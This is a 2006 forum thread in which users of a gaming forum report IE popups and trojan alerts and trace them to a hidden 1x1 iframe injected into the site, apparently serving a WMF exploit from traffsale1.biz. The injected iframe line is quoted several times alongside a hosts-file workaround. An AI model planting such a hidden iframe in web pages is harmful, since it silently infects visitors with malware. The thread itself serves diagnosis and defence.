Xpladdv725.wmf????

Status
Not open for further replies.
ive had no virus/other problems (cept chodebot which is a total bitch to remove, any help?) but of course ive been using mozilla browsers since firebird .7 :D i hate IE with a passion

someone put an iframe on the forums that goes to bitsale1.com or something similar, I forget and it excecutes a bunch of javascripts and tries to download and excecute a bad wmf. or something like that, pop ups in opera, and Im using linux :/

I am getting this annoying popup "explorer user prompt" In the upper left everytime I change screens here. You have to click the boxes closed like 4 times and it takes 20 seconds each making the site near unuseable. WTF is this shit?

Yeah I know get firefox blah,blah. I may not feel like fucking around with installing browsers right now.

The big question is why the hell is gp32x.de trying to install a fucking virus or adware on my computer? :angry:

Last edited by a moderator:
WTF, I use FF and I never have had anyproblems at all.

@DaveC: GET FIREFOX!!!!!, its way better :).

Edit: hmm... I browsed to gp32x from my 2003 server with IE, but nothing weirds happens.

Edit2: HUH, when I clicked a topic it did come up with the exploit.
What is wrong with gp32x, has it been infected or something?
Lol, just to punish ie users :p.

<iframe src="http://traffsale1.biz/dl/adv725.php" width=1 height=1></iframe>

this seems to be the culprit... Look at the little 1x1 frame just above the line with:

Logged in as: luteijn ( Log Out ) My Controls · View New Posts · My Assistant · 0 New Messages

when logged in using Firefox.

P.

DaveC posted on Mar 5 2006 at 07:01 AM said:
I am getting this annoying popup "explorer user prompt" In the upper left everytime I change screens here. You have to click the boxes closed like 4 times and it takes 20 seconds each making the site near unuseable. WTF is this shit?

Yeah I know get firefox blah,blah. I may not feel like fucking around with installing browsers right now.

The big question is why the hell is gp32x.de trying to install a fucking virus or adware on my computer? :angry:
(such harash language)

because its probably been compromised and you cant be arsed to install firefox?

luteijn posted on Mar 5 2006 at 10:18 AM said:
<iframe src="http://traffsale1.biz/dl/adv725.php" width=1 height=1></iframe>

this seems to be the culprit... Look at the little 1x1 frame just above the line with:

Logged in as: luteijn ( Log Out ) My Controls · View New Posts · My Assistant · 0 New Messages

P.
yeah, i see it... but who would have put "<iframesrc="http://traffsale1.biz/dl/adv725.php" width=1 height=1></iframe>" on the site

The <iframe src="http://traffsale1.biz/dl/adv725.php" width=1 height=1></iframe>
seems to be the culprit... Look at the little 1x1 frame just above the line with "Logged in as"

Quick fix would be to add this traffsale1.biz site to your hosts file with a bogus address, like so:

127.0.0.1 traffsale1.biz

(use windows' search function to find the file called 'hosts' (probably somewhere in your windows/system directory and add this line at the bottom. This will redirect the quary too your own box, which doesn't have the php file..)

As for the cause? maybe it's always been there as a kind of add to generate revenue, and someone hacked the addserver? Your guess==as good as mine.

P.

Any chance of getting this fixed, i'm new to the forum but from the word go if I stay on the main page for a bit before navigating to a forum my IE locks up. It starts a java script that then gets blocked Norton. This has the result of locking IE. Which prob is not a bad thing.

I was in the same camp till this issue - Firefox took 2 minutes to install and is very nice to use (so far)

vic20-ian posted on Mar 5 2006 at 11:22 AM said:

I was in the same camp till this issue - Firefox took 2 minutes to install and is very nice to use (so far)
Me is happy :)

WTF is going on....im getting TROJAN this TROJAN that!.....would this of fucked my PC up??????

What the hell is going on with these forums?

This has pissed me off.

Paradox posted on Mar 5 2006 at 05:45 AM said:
couldnt be bothered installing antivirus software, but i should be alright with firefox right? /no1

As long as you don't see weird script things and then something opening, you're fine.

Firefox is immune to this it seems...

Firefox isn't affected, Opera will ask you and IE just downloads it anyway. I found the iframe last night (demonstar should know) but I didn't get anywhere with it apart from finding out that traffsale1.biz is running on Fedora Core using Apache and Opera gives me the message "The URL was redirected to ." when loading up the page in the iframe. I may check with IE but don't particularly want to risk the security of my computer.

Status
Not open for further replies.
Back